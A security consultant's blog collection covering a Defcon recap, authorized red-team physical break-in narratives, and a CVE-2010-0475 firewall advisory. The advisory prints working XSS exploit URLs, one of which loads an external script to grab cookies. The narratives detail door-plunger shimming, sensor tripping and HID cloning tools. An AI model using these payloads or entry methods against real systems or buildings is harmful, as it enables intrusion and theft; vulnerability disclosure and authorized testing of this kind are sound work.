|
ATM Hacking, GSM Exploits, and B-Sides- Oh My! |
 |
 |
 |
|
Written by Jeromie Jackson
|
|
Friday, 06 August 2010 16:52 |
|
Blackhat and Defcon always are a great time in Las Vegas for security practitioners and hackers alike. True to form, this year hit the mark again! Here's a rundown on some of the more interesting findings/talks during the conventions. The Electronic Frontier Foundation (EFF) is an organization focused on defending free speech, privacy, innovation, and consumer rights. I have seen their services in action and I highly endorse their activities. At Defcon there was a mohawk fund raiser for EFF, quite a few roaming the halls during the event. 
ATM Hacking A presentation was given showing security weaknesses within a couple of ATMs. In one of the hacks he exploits the machine via the network. In the other he exposes a USB connection on the device which allows him to install malware. Here's a video of his presentation. GSM Exploits There were a couple presentations about GSM exploitation. In one discussion Chris Paget discussed an IMSI (International Mobile Identity Subscriber) catcher he developed for about $1500.00 that allowed him to impersonate a cell tower. Here's a video of his presentation. Phones would see the tower, which had a high signal strength, then connect allowing for interception of phone conversations. Drivesploit Most of us heard a ton about the Aurora attack that happened not too long ago. A presentation at B-Sides discussed a new Metasploit module that will allow script kiddies to easily conduct drive-by attacks. Here is a copy of the presentation discussing the topic and tool. Parties 
Technology Integration Group (TIG) threw a great party at the Hardwood Suite in the Palms. It was a long hard night, but I had to take one for the team and made it to be slightly before sunrise. Netwitness had a nice event at the top of the Pure Nightclub in Cesears Palace. Thanks go out to Scott Williams of Netwitness for the hook-up! Rapid7 threw down another great party at the Playboy Suite in the Palms. If you know these guys they are VERY high energy. They make Nexpose, one of my preferred tools in my penetration testing and vulnerability assessment toolbag. Ninja Party was off the hook. An invite only party which creates some very cool badges for entry. A HUGE venue. Here's a 360 video of the event that night. B-Sides is an event held alongside Defcon & Blackhat in Las Vegas. Lots of hardcore talks were held, as usual, however the location was definitely kicked-up this year. An estate not too far from the strip, the location rocked. Here's a link to the details along with the presentations. Here's a video of the event from the cabana in the middle of the pools. A great event with friends, prospects, and customers. When you're ready to address security for your organization, you know who to call. |
|
Securing Data Centers by Breaking Into Them |
|
|
|
|
Written by Jeromie Jackson
|
|
Monday, 28 December 2009 18:17 |
|
The locks on the building were of good quality. They were 6 pin Schlage tumbler locks that incorporated 1 or more security pins. Here's what the internals of a lock look like: 
Theoretically any lock of this type is pick-able. Raking is the first technique we used, unsuccessfully. We then began trying to single pick the pins. Over 30 minutes went by between the two methods used. While impatiently waiting I looked around, hunting for other avenues into our goal. 
While standing there, I noted the screws in the window were on our side of the door! After unscrewing a screw we found the shank appeared to be long enough to go through he door. Removing the other 9 screws, and a weather seal, out came the window, and we were on the 3rd floor. From our reconnaissance earlier in the day we knew there was motion sensors run the length of the hallway. Crawling over to the closest door, in order to evade the sensor, my partner began picking the interior door on the office. After 20 minutes, without progress, we decided for him to make the LONG crawl down the hallway to where we had identified a poorly installed door that exposed the plunger. Popping the plunger with a “Lucky-7,” house number from Home Depot, the door was opened. He came around to the other door closer to me, opened the door, and I crawled my way over to the now opened interior door. With no interior motion sensors we had free reign in the office. We obtained several documents containing social security #'s and other confidential data. Taking several tables that were available we stacked them and I jumped over the drop ceiling into the datacenter- mission completed! We took some video, gathered evidence, and left a note for our point of contact on a monitor in the datacenter. Everything was put back the way it was originally, the window in the hallway door was re-installed, and we made our exit through to the stairwell onto the main street- a clean getaway! Our contact arrived at 7:30 the following morning, just as every other day. He went to his desk, found nothing out of the ordinary, and worked through the morning. Around noon he had to enter the datacenter for a task that needed physical access to one of the servers. He looked over to the monitor and found our note: “Dear <Point of Contact>, Please call us to discuss your physical security. Jeromie & Eric.” I will be following up with several articles about circumventing several physical security devices such as HID Proximity cards, some good info and sources for lock picking, creating lockpicking tools, and definitely more on my infosec penetration testing as well. Be sure to follow-me on Twitter!
Should you need any security assessment, regulatory compliance, web-application testing, social engineering, or red-team engagement, I would certainly appreciate the opportunity to earn your business! |
|
Last Updated on Monday, 28 December 2009 18:20 |
|
|
Vulnerability in Palo Alto Networks Firewall |
|
|
|
|
Written by Jeromie Jackson
|
|
Tuesday, 11 May 2010 15:57 |
|
I was playing around over the New Year, found a vulnerability in the Palo Alto Networks firewall, and worked with the vendor to get a patch in place. Make sure you keep up with your maintenance upgrades! Class: Cross-Site Scripting (XSS) Vulnerability CVE: CVE-2010-0475 Remote: Yes Local: Yes Published: May 11, 2010 08:30AM Timeline: Submission to MITRE: 1/18/2010 Vendor Contact: 2/18/2010 Vendor Response: 2/18/2010 Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9) Credit: Jeromie Jackson CISSP, CISM COBIT & ITIL Certified President- San Diego Open Web Application Security Project (OWASP) Vice President- San Diego Information Audit & Control Association (ISACA) SANS Mentor LinkedIn: www.linkedin.com/in/securityassessment Blog: www.JeromieJackson.com Twitter: www.twitter.com/Security_Sifu Validated Vulnerable: Latest Version Per December 31, 2009 Discussion: A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface. By crafting a URL that includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or other nefarious activity. Exploit: Single Line working- https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT>alert("0wn3d")</SCRIPT> &admin-role=%5Bobject+Object%5D&bSubmit=O WORKING FOR REDIRECT TO LOAD cookies into URL. https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT/XSS src="/http://www.jeromiejackson.com/tryme.js"></SCRIPT>&admin-role=%5Bobject+Object%5D&bSubmit=O Solution: A patch will be required from the vendor. It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other such occurrences within the application. References: OWASP Cross-Site Scripting (XSS) Attack Discussion Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet |
|
Last Updated on Tuesday, 11 May 2010 16:02 |
|
Red Team Physical Security Penetration Test |
|
|
|
|
Written by Jeromie Jackson
|
|
Wednesday, 16 December 2009 18:21 |
|
Our customer occupies the entire 3rd and 4th floors in a 4-story multi-tenant building. We took a variety of pictures and videos during this day, identifying and documenting the countermeasures and areas of weakness. One of my favorite new toys is a video camera, microphone and 3 megapixle camera that is housed in a pen. Not only does it produce a good picture and video, it was VERY cheap! I also walked several areas using my Blackberry, acting as though I was texting while walking, when in reality I was video taping the environment. Primary take-away's were large gaps in the front doors, the lack of motion detectors on the 1st floor, access to the plunger on a poorly installed interior door, and identification of the datacenter. Monitoring the location we noted the guards who leave at 10PM. The cleaning crew appeared to set all of the alarms on their way out. First Floor Enterance We did not have all the equipment to clone HID cards, thus our attack did not include cloning HID cards, however it is very easy. If you're interested I recommend checking out RFIdiot. Also, to see how vulnerable HID cards are I recommend checking out this video from Padget that shows a simple cloning device. For a fairly expensive, long-range HID Reading capability check out is more elaborate long-range HID/RFID cloning setup. At approximately 12:30AM we arrived on-site. The back-door is protected by a HID proximity system. Shoving a wire hanger covered in a piece of paper through the door we attempted , and were able to, trip the motion sensor. “CLICK,” went the pins keeping the door closed, but the doors did not open. The plunger/break-away bar was still keeping the door locked. We hit the street-side door and attempted to pick a Schlage lock a minute or two. The amount of police traffic was too high- we left the door. Having severely compromised the organization during the day, my cohort was ready to call it a night. Having a “get out of jail free card,” and being up at 1AM, I wasn't so eager to give up. I went back home, bent up every round bar I had. I needed something I could shove through the door, turn it, and then use it to pull the plunger, opening the door. 
I had that may fit through the door, and off I was for another hit on the building. I called my cohort and told him I would call him back in 30 minutes, successful or not. We needed a strong enough bar we could push through the gap in the doors, and then turn to use to pull he plunger closed. Eight minutes on the back door, and “POP,” I was in! The bent wire above with the needle-nose pliars was the tool that breached the door. I called my accomplice, “I'm In!!!,” I told him and he was on his way to help complete the job. Awaiting Backup Making it into the first floor, due to poorly installed exterior doors, I called my buddy and called the troops in. After calling my wife, letting her know it was going to be a long night, I waited. All the doors in the hallway, except the stairwell, were locked. Not even the bathrooms were left unlocked. After approximately 15 minutes I hear someone yanking on the doors, then I hear radios going off. “It looks like someone tried to shim the door, there are fresh scratch marks,” I heard across the radio transmissions. Burrowing under the first floor stairwell with my bent bar, coat hanger, and get-out-of-jail-free letter, I shivered for over 15 minutes. I couldn't call my buddy as there wasn't service under the stairwell. After approximately 15 minutes the noise had ended- the police had left as nothing was tripped in the facility. We had entered the building and had 5 hours until security would be returning the following morning. My next blog will document getting into the interior offices and compromising the datacenter. Make sure to follow me on Twitter! |
|
Last Updated on Wednesday, 16 December 2009 18:23 |
|
